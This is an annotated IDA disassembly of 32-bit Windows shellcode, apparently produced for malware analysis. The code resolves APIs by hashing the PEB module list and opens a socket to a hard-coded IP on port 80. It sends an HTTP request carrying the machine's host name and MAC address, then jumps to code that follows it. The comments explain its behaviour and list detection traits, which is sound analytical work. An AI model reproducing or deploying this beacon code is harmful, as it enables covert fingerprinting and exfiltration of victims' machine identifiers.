- seg000:00000000 ; Segment type: Pure code
- seg000:00000000 ; Analyst notes: 32-bit x86 listing (IDA output, Intel syntax). The three
- seg000:00000000 ; instructions at offset 0 are the entry stub: the CALL pushes the address of
- seg000:00000000 ; the byte that follows it (offset 7), and sub_91 pops that value into EBP,
- seg000:00000000 ; so every later [ebp+N] operand refers to listing offset 7+N.
- seg000:00000000 seg000 segment byte public 'CODE' use32
- seg000:00000000 assume cs:seg000
- seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
- seg000:00000000 pusha ; save all general registers (no matching restore is visible in this listing)
- seg000:00000001 cld ; DF = 0 so lodsb/scasb/movsb below move forward
- seg000:00000002 call sub_91 ; return address 7 = start of the API resolver; never returned to, used as a base pointer
- seg000:00000007 ; ---- API resolver, reached through "call ebp" from sub_91 ----
- seg000:00000007 ; On entry: [esp] = caller's return address, [esp+4] = 32-bit value naming the
- seg000:00000007 ; wanted export (the "*_salt" constants pushed in sub_91), [esp+8...] = the
- seg000:00000007 ; export's own arguments.
- seg000:00000007 ; The code walks the module list reached from fs:[30h], hashes each module
- seg000:00000007 ; name (ROR 13 + add, lower-case bytes shifted to upper case) and each export
- seg000:00000007 ; name (ROR 13 + add, terminating NUL included), and when module hash + name
- seg000:00000007 ; hash equals the requested value it drops the hash from the stack and jumps
- seg000:00000007 ; to the export, which then returns directly to the original caller.
- seg000:00000007 ; Nothing here goes through an import table, so import-based static triage
- seg000:00000007 ; sees no API use; the fs:[30h] access followed by export-table parsing is
- seg000:00000007 ; the recognisable trait.
- seg000:00000007 ; NOTE(review): structure names in the comments below assume the usual 32-bit
- seg000:00000007 ; Windows PEB / loader-entry / PE export-directory layouts. There is no
- seg000:00000007 ; end-of-list check: an unknown hash keeps following the list.
- seg000:00000007 pusha ; save caller registers; the saved-EAX slot is overwritten at 0x7D
- seg000:00000008 mov ebp, esp ; frame: [ebp+20h] = return address, [ebp+24h] = requested hash
- seg000:0000000A xor edx, edx
- seg000:0000000C mov edx, fs:[edx+30h] ; edx = PEB
- seg000:00000010 mov edx, [edx+0Ch] ; edx = PEB->Ldr
- seg000:00000013 mov edx, [edx+14h] ; edx = first InMemoryOrderModuleList entry
- seg000:00000016
- seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej
- seg000:00000016 mov esi, [edx+28h] ; esi = module name buffer (UTF-16)
- seg000:00000019 movzx ecx, word ptr [edx+26h] ; ecx = number of bytes to hash (name MaximumLength)
- seg000:0000001D xor edi, edi ; edi = running module-name hash
- seg000:0000001F
- seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj
- seg000:0000001F xor eax, eax
- seg000:00000021 lodsb ; one byte of the name at a time (both halves of each UTF-16 unit)
- seg000:00000022 cmp al, 61h ; 'a'
- seg000:00000024 jl short loc_28 ; signed compare: only bytes in 'a'..7Fh are adjusted
- seg000:00000026 sub al, 20h ; ' ' -- fold to upper case so the hash is case-insensitive
- seg000:00000028
- seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j
- seg000:00000028 ror edi, 0Dh ; hash = ror(hash, 13) + byte
- seg000:0000002B add edi, eax
- seg000:0000002D loop loc_1F
- seg000:0000002F push edx ; [ebp-4] = current list entry
- seg000:00000030 push edi ; [ebp-8] = module-name hash
- seg000:00000031 mov edx, [edx+10h] ; edx = module base address
- seg000:00000034 mov eax, [edx+3Ch] ; eax = e_lfanew
- seg000:00000037 add eax, edx ; eax = PE header
- seg000:00000039 mov eax, [eax+78h] ; eax = export directory RVA
- seg000:0000003C test eax, eax
- seg000:0000003E jz short loc_8A ; module exports nothing: try the next one
- seg000:00000040 add eax, edx ; eax = export directory VA
- seg000:00000042 push eax ; keep it for the ordinal/function lookups
- seg000:00000043 mov ecx, [eax+18h] ; ecx = NumberOfNames
- seg000:00000046 mov ebx, [eax+20h] ; ebx = AddressOfNames RVA
- seg000:00000049 add ebx, edx
- seg000:0000004B
- seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j
- seg000:0000004B jecxz short loc_89 ; every name tried without a match: next module
- seg000:0000004D dec ecx ; names are scanned from last to first
- seg000:0000004E mov esi, [ebx+ecx*4] ; RVA of export name ecx
- seg000:00000051 add esi, edx
- seg000:00000053 xor edi, edi ; edi = running export-name hash
- seg000:00000055
- seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj
- seg000:00000055 xor eax, eax
- seg000:00000057 lodsb
- seg000:00000058 ror edi, 0Dh
- seg000:0000005B add edi, eax
- seg000:0000005D cmp al, ah ; ah is 0 here, so this stops after the NUL has been hashed
- seg000:0000005F jnz short loc_55
- seg000:00000061 add edi, [ebp-8] ; combine with the module-name hash
- seg000:00000064 cmp edi, [ebp+24h] ; equal to the hash the caller pushed?
- seg000:00000067 jnz short loc_4B
- seg000:00000069 pop eax ; eax = export directory
- seg000:0000006A mov ebx, [eax+24h] ; AddressOfNameOrdinals
- seg000:0000006D add ebx, edx
- seg000:0000006F mov cx, [ebx+ecx*2] ; cx = function index for the matched name
- seg000:00000073 mov ebx, [eax+1Ch] ; AddressOfFunctions
- seg000:00000076 add ebx, edx
- seg000:00000078 mov eax, [ebx+ecx*4] ; function RVA
- seg000:0000007B add eax, edx ; eax = function address
- seg000:0000007D mov [esp+24h], eax ; write into pusha's saved-EAX slot so popa hands it back in EAX
- seg000:00000081 pop ebx ; discard saved module hash
- seg000:00000082 pop ebx ; discard saved list entry
- seg000:00000083 popa ; restore caller registers, EAX = resolved address
- seg000:00000084 pop ecx ; ecx = caller's return address
- seg000:00000085 pop edx ; remove the hash argument
- seg000:00000086 push ecx ; return address back on top of the real arguments
- seg000:00000087 jmp eax ; tail-jump: the export returns straight to the caller
- seg000:00000089 ; ---------------------------------------------------------------------------
- seg000:00000089
- seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj
- seg000:00000089 pop eax ; drop export directory pointer
- seg000:0000008A
- seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej
- seg000:0000008A pop edi ; drop module hash
- seg000:0000008B pop edx ; edx = current list entry
- seg000:0000008C mov edx, [edx] ; follow Flink to the next module
- seg000:0000008E jmp short loc_16
- seg000:0000008E ; ---------------------------------------------------------------------------
- seg000:00000090 dbCnt db 5 ; remaining connect() attempts; decremented in place at 0x106, so this memory is written at run time
- seg000:00000091
- seg000:00000091 ; =============== S U B R O U T I N E =======================================
- seg000:00000091
- seg000:00000091 ; Analyst notes for sub_91 (main body). EBP = 7 (the API resolver), so
- seg000:00000091 ; "call ebp" means "resolve the pushed hash and call that export", and
- seg000:00000091 ; [ebp+N] is listing offset 7+N.
- seg000:00000091 ; Visible behaviour, in order:
- seg000:00000091 ;   1. checks that the request template at 2F0h starts with 'GET ';
- seg000:00000091 ;   2. loads ws2_32 and IPHLPAPI, starts Winsock, creates a socket (2,1,0);
- seg000:00000091 ;   3. connects to the 16-byte sockaddr at 2E8h, up to dbCnt (5) attempts;
- seg000:00000091 ;   4. reads the local host name, resolves it, and asks SendARP for the
- seg000:00000091 ;      hardware address of the first resolved IPv4 address;
- seg000:00000091 ;   5. builds, in place after 'Host: ', the text
- seg000:00000091 ;      <host name, max 32 bytes> CRLF 'Cookie: ID=' <12 upper-case hex digits>
- seg000:00000091 ;      followed by the fixed header block at 27Ch, and sends it;
- seg000:00000091 ;   6. closes the socket and jumps to the small stub that sub_257 copied
- seg000:00000091 ;      behind the request text.
- seg000:00000091 ; Every failure path also ends at loc_10E, so the jump in step 6 happens
- seg000:00000091 ; whether or not anything was sent. No reply is read from the socket.
- seg000:00000091 ; For detection: the fixed request path, a Host header carrying the local
- seg000:00000091 ; machine name, and 'Cookie: ID=' with 12 hex digits are the on-wire traits;
- seg000:00000091 ; the code also writes into its own image (90h, 252h, 256h, 32Ah onward),
- seg000:00000091 ; so it needs memory that is both writable and executable.
- seg000:00000091
- seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p
- seg000:00000091 pop ebp ; ebp = 7 = address of the API resolver (also the data base pointer)
- seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h ; bytes 'G','E','T',' ' expected at 2F0h
- seg000:0000009C jnz short loc_10E ; template missing: skip all network activity
- seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32
- seg000:000000A4 push eax
- seg000:000000A5 push 726774Ch ; LoadLibraryA_salt
- seg000:000000AA call ebp ; LoadLibraryA("ws2_32")
- seg000:000000AC test eax, eax
- seg000:000000AE jz short loc_10E
- seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI
- seg000:000000B6 push eax
- seg000:000000B7 push 726774Ch ; LoadLibraryA_salt
- seg000:000000BC call ebp ; LoadLibraryA("IPHLPAPI")
- seg000:000000BE test eax, eax
- seg000:000000C0 jz short loc_10E
- seg000:000000C2 mov ebx, 190h
- seg000:000000C7 sub esp, ebx ; 190h-byte stack buffer for the WSADATA output
- seg000:000000C9 push esp ; arg 2: pointer to that buffer
- seg000:000000CA push ebx ; arg 1: 190h reused as the version word
- seg000:000000CB push 6B8029h ; WSAStartup_salt
- seg000:000000D0 call ebp
- seg000:000000D2 add esp, ebx ; release the buffer
- seg000:000000D4 test eax, eax
- seg000:000000D6 jnz short loc_10E ; non-zero = WSAStartup failed
- seg000:000000D8 push eax ; eax is 0 here: four zero arguments
- seg000:000000D9 push eax
- seg000:000000DA push eax
- seg000:000000DB push eax
- seg000:000000DC inc eax
- seg000:000000DD push eax ; type = 1 (SOCK_STREAM)
- seg000:000000DE inc eax
- seg000:000000DF push eax ; af = 2 (AF_INET)
- seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt
- seg000:000000E5 call ebp ; WSASocketA(2, 1, 0, 0, 0, 0)
- seg000:000000E7 xor ebx, ebx
- seg000:000000E9 not ebx ; ebx = FFFFFFFFh (INVALID_SOCKET)
- seg000:000000EB cmp ebx, eax
- seg000:000000ED jz short loc_10E
- seg000:000000EF mov ebx, eax ; ebx = socket handle for the rest of the routine
- seg000:000000F1
- seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj
- seg000:000000F1 push 10h ; namelen = 16
- seg000:000000F3 lea esi, [ebp+2E1h] ; 2E8h: embedded sockaddr (the two dd values)
- seg000:000000F9 push esi
- seg000:000000FA push ebx
- seg000:000000FB push 6174A599h ; connect_salt
- seg000:00000100 call ebp ; connect(socket, sockaddr, 16)
- seg000:00000102 test eax, eax
- seg000:00000104 jz short loc_125 ; 0 = connected
- seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt
- seg000:0000010C jnz short loc_F1 ; retry until the counter reaches 0; the socket is not closed on this path
- seg000:0000010E
- seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj
- seg000:0000010E ; sub_91+1Dj ...
- seg000:0000010E cmp byte ptr [ebp+24Fh], 1 ; flag at 256h: 1 = request text already completed by the send path
- seg000:00000115 jz short loc_11E
- seg000:00000117 call sub_257 ; not yet: append header tail + stub, then measure (falls into sub_270)
- seg000:0000011C jmp short loc_123
- seg000:0000011E ; ---------------------------------------------------------------------------
- seg000:0000011E
- seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j
- seg000:0000011E call sub_270 ; only measure: leaves edi one byte past the request's NUL
- seg000:00000123
- seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj
- seg000:00000123 jmp edi ; edi = copy of the stub from 2BDh that sits right after the NUL
- seg000:00000125 ; ---------------------------------------------------------------------------
- seg000:00000125
- seg000:00000125 loc_125: ; CODE XREF: sub_91+73j
- seg000:00000125 mov eax, 100h
- seg000:0000012A sub esp, eax ; 256-byte stack buffer for the host name
- seg000:0000012C mov edx, esp
- seg000:0000012E push edx ; extra copy of the buffer pointer, popped into edi after the call
- seg000:0000012F push eax ; arg 2: namelen = 100h
- seg000:00000130 push edx ; arg 1: name buffer
- seg000:00000131 push 1DE49B6h ; gethostname_salt
- seg000:00000136 call ebp
- seg000:00000138 pop edi ; edi = host-name buffer
- seg000:00000139 add esp, 100h ; buffer released here but still read through edi/esi below
- seg000:0000013F test eax, eax
- seg000:00000141 jnz loc_239
- seg000:00000147 push edi
- seg000:00000148 call sub_246 ; ecx = length of the host name
- seg000:0000014D pop esi ; esi = host-name buffer
- seg000:0000014E mov edx, ecx
- seg000:00000150 lea edi, [ebp+2E9h] ; 2F0h: 'GET ... Host: ' template
- seg000:00000156 call sub_246 ; edi = one past the template's NUL
- seg000:0000015B dec edi ; edi = the NUL itself = append position
- seg000:0000015C cmp edx, 20h ; ' '
- seg000:0000015F jl short loc_166
- seg000:00000161 mov edx, 20h ; ' ' -- host name is truncated to 32 bytes
- seg000:00000166
- seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj
- seg000:00000166 mov ecx, edx
- seg000:00000168 push esi ; keep the host-name pointer across the copies
- seg000:00000169 rep movsb ; append host name after 'Host: '
- seg000:0000016B mov ecx, 0Dh
- seg000:00000170 lea esi, [ebp+2C4h] ; 2CBh: CRLF 'Cookie: ID=' (13 bytes)
- seg000:00000176 rep movsb
- seg000:00000178 mov [ebp+24Bh], edi ; 252h: remember where the ID value has to go
- seg000:0000017E pop esi
- seg000:0000017F push esi ; arg: host name
- seg000:00000180 push 803428A9h ; gethostbyname_salt
- seg000:00000185 call ebp
- seg000:00000187 test eax, eax
- seg000:00000189 jz loc_239
- seg000:0000018F mov cx, [eax+0Ah] ; hostent address length
- seg000:00000193 cmp cx, 4
- seg000:00000197 jb loc_239 ; need at least a 4-byte (IPv4) address
- seg000:0000019D lea eax, [eax+0Ch] ; address-list field
- seg000:000001A0 mov eax, [eax]
- seg000:000001A2 mov ecx, [eax] ; pointer to the first address
- seg000:000001A4 mov ecx, [ecx] ; ecx = first IPv4 address of this host
- seg000:000001A6 mov eax, 100h
- seg000:000001AB push eax ; in/out length variable, initialised to 100h
- seg000:000001AC mov edi, esp ; edi = &length
- seg000:000001AE sub esp, eax
- seg000:000001B0 mov esi, esp ; esi = 256-byte output buffer
- seg000:000001B2 push edi ; arg 4: pointer to length
- seg000:000001B3 push esi ; arg 3: output buffer
- seg000:000001B4 push ecx ; arg 2: source IP
- seg000:000001B5 push ecx ; arg 1: destination IP -- the host's own address in both slots
- seg000:000001B6 push 0B8D27248h ; SendARP_salt
- seg000:000001BB call ebp
- seg000:000001BD test eax, eax ; flags are overwritten by the next add: the return code is not acted on
- seg000:000001BF add esp, 104h ; release buffer + length variable (both still read below)
- seg000:000001C5 movzx ecx, word ptr [edi] ; low word of the returned length
- seg000:000001C8 cmp ecx, 6
- seg000:000001CB jb short loc_239 ; fewer than 6 address bytes: give up
- seg000:000001CD mov ecx, 6 ; encode exactly 6 bytes
- seg000:000001D2 mov eax, 10h
- seg000:000001D7 sub esp, eax ; 16-byte scratch buffer for the hex text
- seg000:000001D9 mov edi, esp
- seg000:000001DB mov edx, ecx
- seg000:000001DD shl edx, 1 ; 12 = number of hex digits
- seg000:000001DF push eax ; saved 10h (scratch size)
- seg000:000001E0 push edx ; saved 12 (digit count)
- seg000:000001E1
- seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj
- seg000:000001E1 xor edx, edx
- seg000:000001E3 mov dl, [esi] ; next address byte
- seg000:000001E5 mov al, dl
- seg000:000001E7 and al, 0F0h
- seg000:000001E9 shr al, 4 ; high nibble
- seg000:000001EC cmp al, 9
- seg000:000001EE ja short loc_1F4
- seg000:000001F0 add al, 30h ; '0'
- seg000:000001F2 jmp short loc_1F6
- seg000:000001F4 ; ---------------------------------------------------------------------------
- seg000:000001F4
- seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj
- seg000:000001F4 add al, 37h ; '7' -- 10..15 become 'A'..'F'
- seg000:000001F6
- seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j
- seg000:000001F6 mov [edi], al
- seg000:000001F8 inc edi
- seg000:000001F9 mov al, dl
- seg000:000001FB and al, 0Fh ; low nibble
- seg000:000001FD cmp al, 9
- seg000:000001FF ja short loc_205
- seg000:00000201 add al, 30h ; '0'
- seg000:00000203 jmp short loc_207
- seg000:00000205 ; ---------------------------------------------------------------------------
- seg000:00000205
- seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej
- seg000:00000205 add al, 37h ; '7'
- seg000:00000207
- seg000:00000207 loc_207: ; CODE XREF: sub_91+172j
- seg000:00000207 mov [edi], al
- seg000:00000209 inc edi
- seg000:0000020A inc esi
- seg000:0000020B loop loc_1E1
- seg000:0000020D pop ecx ; ecx = 12
- seg000:0000020E sub edi, ecx ; back to the first hex digit
- seg000:00000210 mov esi, edi
- seg000:00000212 pop eax ; eax = 10h
- seg000:00000213 add esp, eax ; release the scratch buffer
- seg000:00000215 mov edi, [ebp+24Bh] ; position saved after 'Cookie: ID='
- seg000:0000021B rep movsb ; append the 12 hex digits
- seg000:0000021D mov byte ptr [ebp+24Fh], 1 ; 256h: mark the request as completed
- seg000:00000224 call sub_257 ; append header tail + stub; falls into sub_270, so ecx = request length, edi = past its NUL
- seg000:00000229 xor eax, eax
- seg000:0000022B push eax ; arg 4: flags = 0
- seg000:0000022C push ecx ; arg 3: length (NUL not included)
- seg000:0000022D sub edi, ecx
- seg000:0000022F dec edi ; edi = start of the request text (2F0h)
- seg000:00000230 push edi ; arg 2: buffer
- seg000:00000231 push ebx ; arg 1: socket
- seg000:00000232 push 5F38EBC2h ; send_salt
- seg000:00000237 call ebp ; result of send is not checked
- seg000:00000239
- seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j
- seg000:00000239 ; sub_91+F8j ...
- seg000:00000239 push ebx
- seg000:0000023A push 614D6E75h ; closesocket_salt
- seg000:0000023F call ebp
- seg000:00000241 jmp loc_10E ; common exit: hand control to the stub behind the request text
- seg000:00000241 sub_91 endp ; sp-analysis failed
- seg000:00000241
- seg000:00000246
- seg000:00000246 ; =============== S U B R O U T I N E =======================================
- seg000:00000246
- seg000:00000246 ; sub_246: length of the NUL-terminated byte string at EDI.
- seg000:00000246 ; In:    edi = string start (DF is clear, set by the cld at offset 1)
- seg000:00000246 ; Out:   ecx = length without the NUL, edi = one byte past the NUL, eax = 0
- seg000:00000246 ; The scan has no length limit other than the 32-bit counter.
- seg000:00000246
- seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p
- seg000:00000246 ; sub_91+C5p ...
- seg000:00000246 xor ecx, ecx
- seg000:00000248 not ecx ; ecx = FFFFFFFFh: maximum scan count
- seg000:0000024A xor eax, eax ; al = 0, the byte searched for
- seg000:0000024C repne scasb ; advance edi until the NUL has been consumed
- seg000:0000024E not ecx ; ecx = bytes scanned, NUL included
- seg000:00000250 dec ecx ; drop the NUL from the count
- seg000:00000251 retn
- seg000:00000251 sub_246 endp
- seg000:00000251
- seg000:00000251 ; ---------------------------------------------------------------------------
- seg000:00000252 ; Run-time scratch bytes. 252h-255h are written as one dword through
- seg000:00000252 ; [ebp+24Bh] (the append position after 'Cookie: ID='); 256h is the byte
- seg000:00000252 ; flag at [ebp+24Fh] that sub_91 sets to 1 once the request is complete.
- seg000:00000252 db 0
- seg000:00000253 db 0
- seg000:00000254 db 0
- seg000:00000255 db 0
- seg000:00000256 db 0
- seg000:00000257
- seg000:00000257 ; =============== S U B R O U T I N E =======================================
- seg000:00000257
- seg000:00000257 ; sub_257: append the fixed block that starts at 27Ch to the end of the
- seg000:00000257 ; request text at 2F0h. The copy is 4Fh (79) bytes: the 65 bytes of header
- seg000:00000257 ; text including its NUL, plus the 14 bytes of code at 2BDh-2CAh, so a copy
- seg000:00000257 ; of that stub ends up directly behind the request's terminator.
- seg000:00000257 ; There is no retn: the rep movsb at 26Eh is two bytes long, so execution
- seg000:00000257 ; continues into sub_270 at 270h, and that routine's retn serves both.
- seg000:00000257 ; This is why IDA reports "sp-analysis failed" here.
- seg000:00000257 ; In:    ebp = 7 (base pointer set up in sub_91)
- seg000:00000257 ; Out:   as sub_270 (ecx = request length, edi = one past its NUL)
- seg000:00000257
- seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p
- seg000:00000257 ; sub_91+193p
- seg000:00000257 lea edi, [ebp+2E9h] ; 2F0h: start of the request text
- seg000:0000025D call sub_246 ; edi = one past the current NUL
- seg000:00000262 dec edi ; edi = the NUL = append position
- seg000:00000263 mov ecx, 4Fh ; 'O'
- seg000:00000268 lea esi, [ebp+275h] ; 27Ch: header tail, followed by the stub code
- seg000:0000026E rep movsb ; falls through into sub_270
- seg000:0000026E sub_257 endp ; sp-analysis failed
- seg000:0000026E
- seg000:00000270
- seg000:00000270 ; =============== S U B R O U T I N E =======================================
- seg000:00000270
- seg000:00000270 ; sub_270: measure the request text at 2F0h.
- seg000:00000270 ; In:    ebp = 7 (base pointer set up in sub_91)
- seg000:00000270 ; Out:   ecx = length without the NUL, edi = one byte past the NUL, eax = 0
- seg000:00000270 ; Also the tail of sub_257, which runs into this code without a jump.
- seg000:00000270
- seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep
- seg000:00000270 lea edi, [ebp+2E9h] ; 2F0h: start of the request text
- seg000:00000276 call sub_246
- seg000:0000027B retn
- seg000:0000027B sub_270 endp
- seg000:0000027B
- seg000:0000027B ; ---------------------------------------------------------------------------
- seg000:0000027C ; Embedded data. The header text below is 65 bytes including its NUL;
- seg000:0000027C ; sub_257 copies 4Fh bytes from here, so the code at 2BDh travels with it.
- seg000:0000027C aConnectionKeep db 0Dh,0Ah
- seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah
- seg000:0000027C db 'Accept: */*',0Dh,0Ah
- seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah
- seg000:0000027C db 0Dh,0Ah,0
- seg000:000002BD ; ---------------------------------------------------------------------------
- seg000:000002BD ; Exit stub (14 bytes). sub_91 jumps to the copy of this code that sits
- seg000:000002BD ; behind the request text, with edi pointing at the copy's first byte.
- seg000:000002BD ; It skips its own length, then any run of zero bytes, and jumps to the
- seg000:000002BD ; first non-zero byte. NOTE(review): what lies there is outside this
- seg000:000002BD ; listing; presumably code placed after this blob by whatever loaded it.
- seg000:000002BD add edi, 0Eh ; step over these 14 bytes
- seg000:000002C0 xor ecx, ecx
- seg000:000002C2 not ecx ; ecx = FFFFFFFFh: maximum scan count
- seg000:000002C4 xor eax, eax ; al = 0
- seg000:000002C6 repe scasb ; advance while bytes are zero; stops one past the first non-zero byte
- seg000:000002C8 dec edi ; back onto that non-zero byte
- seg000:000002C9 jmp edi
- seg000:000002C9 ; ---------------------------------------------------------------------------
- seg000:000002CB aCookieId db 0Dh,0Ah
- seg000:000002CB db 'Cookie: ID=' ; 13 bytes with the CRLF, no NUL; copied with ecx = 0Dh at 0x16B
- seg000:000002D8 aWs2_32 db 'ws2_32',0
- seg000:000002DF aIphlpapi db 'IPHLPAPI',0
- seg000:000002E8 dd 50000002h ; start of the 16-byte sockaddr passed to connect: bytes 02 00 = family 2 (AF_INET), 00 50 = port 80 in network order
- seg000:000002EC dd 36CADE41h ; address bytes 41 DE CA 36 in memory order, i.e. 65.222.202.54
- seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah
- seg000:000002F0 db 'Host: ',0 ; the NUL at 32Ah is where sub_91 starts appending, so the request grows past the end of this listing
- seg000:0000032B db 0